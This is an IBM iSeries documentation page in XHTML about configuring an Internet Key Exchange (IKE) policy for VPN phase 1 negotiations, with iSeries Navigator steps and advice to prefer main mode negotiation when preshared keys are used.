96 lines
6.9 KiB
HTML
96 lines
6.9 KiB
HTML
|
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
<!DOCTYPE html
|
||
|
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||
|
<html lang="en-us" xml:lang="en-us">
|
||
|
<head>
|
||
|
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
|
||
|
<meta name="security" content="public" />
|
||
|
<meta name="Robots" content="index,follow" />
|
||
|
<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.icra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
|
||
|
<meta name="DC.Type" content="task" />
|
||
|
<meta name="DC.Title" content="Configure an Internet Key Exchange (IKE) policy" />
|
||
|
<meta name="abstract" content="The IKE policy defines what level of authentication and encryption protection IKE uses during phase 1 negotiations." />
|
||
|
<meta name="description" content="The IKE policy defines what level of authentication and encryption protection IKE uses during phase 1 negotiations." />
|
||
|
<meta name="DC.Relation" scheme="URI" content="rzajavpnpolicy.htm" />
|
||
|
<meta name="DC.Relation" scheme="URI" content="rzajasecassociations.htm" />
|
||
|
<meta name="DC.Relation" scheme="URI" content="rzajasecassociations.htm" />
|
||
|
<meta name="DC.Relation" scheme="URI" content="../rzahu/rzahurazhudigitalcertmngmnt.htm" />
|
||
|
<meta name="copyright" content="(C) Copyright IBM Corporation 2000, 2006" />
|
||
|
<meta name="DC.Rights.Owner" content="(C) Copyright IBM Corporation 2000, 2006" />
|
||
|
<meta name="DC.Format" content="XHTML" />
|
||
|
<meta name="DC.Identifier" content="rzajaprotectyourkeys" />
|
||
|
<meta name="DC.Language" content="en-us" />
|
||
|
<!-- All rights reserved. Licensed Materials Property of IBM -->
|
||
|
<!-- US Government Users Restricted Rights -->
|
||
|
<!-- Use, duplication or disclosure restricted by -->
|
||
|
<!-- GSA ADP Schedule Contract with IBM Corp. -->
|
||
|
<link rel="stylesheet" type="text/css" href="./ibmdita.css" />
|
||
|
<link rel="stylesheet" type="text/css" href="./ic.css" />
|
||
|
<title>Configure an Internet Key Exchange (IKE) policy</title>
|
||
|
</head>
|
||
|
<body id="rzajaprotectyourkeys"><a name="rzajaprotectyourkeys"><!-- --></a>
|
||
|
<!-- Java sync-link --><script language="Javascript" src="../rzahg/synch.js" type="text/javascript"></script>
|
||
|
<h1 class="topictitle1">Configure an Internet Key Exchange (IKE) policy</h1>
|
||
|
<div><p>The IKE policy defines what level of authentication and encryption
|
||
|
protection IKE uses during phase 1 negotiations.</p>
|
||
|
<div class="section"><p>IKE phase 1 establishes the keys that protect the messages that
|
||
|
flow in the subsequent phase 2 negotiations. You do not need to define an
|
||
|
IKE policy when you create a manual connection. In addition, if you create
|
||
|
your VPN with the New Connection wizard, the wizard can create your IKE policy
|
||
|
for you.</p>
|
||
|
<p>VPN uses either RSA signature mode or preshared keys to authenticate
|
||
|
phase 1 negotiations. If you plan to use digital certificates for authenticating
|
||
|
the key servers, you must first configure them by using the <span class="keyword">Digital Certificate Manager</span>
|
||
|
(5722-SS1 Option 34). The IKE policy also identifies which remote key server
|
||
|
will use this policy.</p>
|
||
|
<p>To define an IKE policy or make changes to an
|
||
|
existing one, follow these steps:</p>
|
||
|
</div>
|
||
|
<ol><li><span>In <span class="keyword">iSeries™ Navigator</span>, expand
|
||
|
your <span class="menucascade"><span class="uicontrol">server</span> > <span class="uicontrol">Network</span> > <span class="uicontrol">IP Policies</span> > <span class="uicontrol">Virtual Private Networking</span> > <span class="uicontrol">IP Security Policies</span></span>.</span></li>
|
||
|
<li><span>To create a new policy, right-click <span class="uicontrol">Internet Key Exchange
|
||
|
Policies</span> and select <span class="uicontrol">New Internet Key Exchange Policy</span>.
|
||
|
To make changes to an existing policy, click <span class="uicontrol">Internet Key Exchange
|
||
|
Policies</span> in the left pane then right-click the policy you want
|
||
|
to change in the right pane, and select <span class="uicontrol">Properties</span>.</span></li>
|
||
|
<li><span>Complete each of the property sheets. Click <span class="uicontrol">Help</span> if
|
||
|
you have questions about how complete a page or any of its fields.</span></li>
|
||
|
<li><span>Click <span class="uicontrol">OK</span> to save your changes.</span></li>
|
||
|
</ol>
|
||
|
<div class="section">It is recommended that you use main mode negotiation whenever a preshared
|
||
|
key is used for authentication. They provide a more secure exchange. If you
|
||
|
must use preshared keys and aggressive mode negotiation, select obscure passwords
|
||
|
that are unlikely to be cracked in attacks that scan the dictionary. It is
|
||
|
also recommended you periodically change your passwords. To force a key exchange
|
||
|
to use main mode negotiation, perform the following tasks: <ol><li>In <span class="keyword">iSeries Navigator</span>, expand your
|
||
|
server <span class="menucascade"><span class="uicontrol">Network</span> > <span class="uicontrol">IP Policies.</span></span> </li>
|
||
|
<li>Select <span class="menucascade"><span class="uicontrol">Virtual Private Networking</span> > <span class="uicontrol">IP Security Policies</span> > <span class="uicontrol">Internet Key Exchange
|
||
|
Policies</span></span> to view the currently defined key exchange
|
||
|
policies within the right-hand pane.</li>
|
||
|
<li>Right-click a particular key exchange policy and select <span class="uicontrol">Properties</span>. </li>
|
||
|
<li>On the Transforms page, click <span class="uicontrol">Responding Policy</span>.
|
||
|
The Responding Internet Key Exchange Policy dialog appears. </li>
|
||
|
<li>In the Identity protection field, deselect <span class="uicontrol">IKE aggressive mode
|
||
|
negotiation (no identity protection)</span>. </li>
|
||
|
<li>Click <span class="uicontrol">OK</span> to return to the Properties dialog.</li>
|
||
|
<li>Click <span class="uicontrol">OK</span> again to save your changes.</li>
|
||
|
</ol>
|
||
|
<div class="note"><span class="notetitle">Note:</span> When you set the identity protection field, the change is effective
|
||
|
for all exchanges with remote key servers, because there is only one responding
|
||
|
IKE policy for the entire system. Main mode negotiation ensures that the initiating
|
||
|
system can only request a main mode key policy exchange.</div>
|
||
|
</div>
|
||
|
</div>
|
||
|
<div>
|
||
|
<div class="familylinks">
|
||
|
<div class="parentlink"><strong>Parent topic:</strong> <a href="rzajavpnpolicy.htm" title="After you determine how you will use your VPN you must define your VPN security policies.">Configure VPN security policies</a></div>
|
||
|
</div>
|
||
|
<div class="relconcepts"><strong>Related concepts</strong><br />
|
||
|
<div><a href="rzajasecassociations.htm" title="A dynamic VPN provides additional security for your communications by using the Internet Key Exchange (IKE) protocol for key management. IKE allows the VPN servers on each end of the connection to negotiate new keys at specified intervals.">Key management</a></div>
|
||
|
</div>
|
||
|
<div class="reltasks"><strong>Related tasks</strong><br />
|
||
|
<div><a href="../rzahu/rzahurazhudigitalcertmngmnt.htm">Digital Certificate Manager</a></div>
|
||
|
</div>
|
||
|
</div>
|
||
|
</body>
|
||
|
</html>
|